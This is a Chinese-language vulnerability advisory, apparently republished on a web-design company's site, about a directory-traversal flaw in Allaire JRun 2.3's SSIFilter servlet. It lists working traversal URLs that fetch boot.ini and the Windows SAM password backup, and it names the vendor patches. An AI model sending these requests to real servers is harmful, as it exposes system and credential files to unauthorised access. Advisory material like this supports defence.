151-3895-5886

Allaire JRUN 2.3 查看任意文件漏洞

2019年09月19日 维尼网络
涉及程序:
JRUN

描述:
Allaire JRUN 2.3 查看任意文件漏洞

详细:
Allaire 的 JRUN 服务器 2.3上存在多重显示代码漏洞。该漏洞允许攻击者在 WEB 服务器上查看根目录下的任意文件的源代码。
JRun 2.3 使用 Java Servlets 解析各种各样类型的页面(例如:HTML, JSP等等)。基于rules.properties 和 servlets.properties 的文件设置,可能利用网址前缀"/servlet/"调用任何servlet。

它可能使用 Jrun 的 SSIFilter servlet 在目标系统上检索任意的文件。下列 2 个例子显示出能被用来检索任意的文件的 网址s :

:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../t
est.jsp

:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../.
./../../../../boot.ini

:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../.
./../../../../winnt/repair/sam._
:8000/servlet/ssifilter/../../test.jsp
:8000/servlet/ssifilter/../../../../../../../boot.ini

:8000/servlet/ssifilter/../../../../../../../winnt/repair/sam._

注意:假设JRun在主机“ jrun ”上运行,端口8000。

受影响的系统:
Allaire JRun 2.3.x

解决方法:
download并安装补丁:
Allaire patch jr233p_ASB00_28_29

Windows 95/98/NT/2000 and Windows NT Alpha

Allaire patch jr233p_ASB00_28_29tar

UNIX/Linux patch - GNU gzip/tar


阅读更多内容
上一篇MyFirstServlet
下一篇Allair JRUN 非法读取 WEB-INF 漏洞

声明:本页内容由郑州维尼网络收集编辑所得,所有资料仅供用户参考,转载请保留此链接http://www.zzwn.cn/cms/3554.html

本文标签: 漏洞 JRUN 文件 查看 任意 Allaire

 

相关资讯 Related Info
相关分类 News Classification
解决方案 Solutions
相关热点 Hot spot
接触 solaris : 整和 apache 和 tomcat 接触 solaris : 整和 apache 和 tomcat
  1. 我们的承诺
  2. 我们的实力
  3. 我们的未来
郑州做网站咨询电话 建站咨询

151-3895-5886

网站备案安全放心网站

地址:郑州市上街区和昌都汇广场 / 电话:151-3895-5886
客服QQ: 7758021 / 邮箱:admin@zzwn.cn
Copyright © 2010-2019 郑州融科网络 版权所有